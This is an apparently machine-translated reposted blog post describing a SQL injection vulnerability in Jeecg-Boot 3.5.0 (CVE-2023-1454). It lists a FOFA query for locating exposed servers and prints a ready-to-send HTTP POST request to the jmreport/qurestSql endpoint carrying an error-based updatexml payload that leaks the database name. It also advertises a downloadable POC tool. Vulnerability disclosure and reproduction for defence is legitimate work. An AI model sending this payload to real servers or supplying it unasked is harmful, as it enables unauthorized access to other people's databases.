Jeecg-Boot has a foreground SQL injection vulnerability (CVE-2023-1454)

Database 2023-09-05 17:17:13 views: null

Article Directory

Jeecg-Boot has a foreground SQL injection vulnerability (CVE-2023-1454)

1. Introduction to Jeecg-Boot

WeChat Official Account Search: Nanfeng Vulnerability Reappearance Library,
Nanfeng Network Security Official Account First Release

eecgBoot is a low-code platform based on BPM! Front-end and back-end separation architecture SpringBoot 2.x, SpringCloud, Ant Design&Vue, Mybatis-plus, Shiro, JWT, support microservices. The powerful code generator enables one-click generation of front-end and back-end codes, enabling low-code development! JeecgBoot leads the new low-code development mode OnlineCoding->code generator->manual MERGE, helping Java projects solve 70% of repetitive work, allowing development to focus more on business, which can quickly improve efficiency, save R&D costs, and at the same time maintain flexibility! A series of low-code capabilities: Online forms, Online reports, Online charts, form design, process design, report design, large screen design, etc.

2. Vulnerability description

There is a SQL injection vulnerability in jeecg-boot version 3.5.0, which is caused by a security problem in the file jmreport/qurestSql, which leads to SQL injection through the parameter apiSelectId.
CVE-2023-1454
CNNVD-202303-1399

3. Affect the version

jeecg-boot version 3.5.0

4. fofa query statement

body=“jeecg-boot”

5. Vulnerability recurrence

Vulnerability Packet

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 126

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '"}

Successfully exploded the database name
insert image description here

6.POC&EXP

Follow the public account Nanfeng Vulnerability Reproduction Library and reply Vulnerability Reproduction 12 to get the download address of the POC tool:

insert image description here

7. Rectification opinions

At present, the manufacturer has not released any repair measures to solve this security problem. Users who use this software are advised to pay attention to the manufacturer's homepage or reference URL for solutions:
https://github.com/jeecgboot/jeecg-boot

Guess you like

Origin blog.csdn.net/nnn2188185/article/details/130067884
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com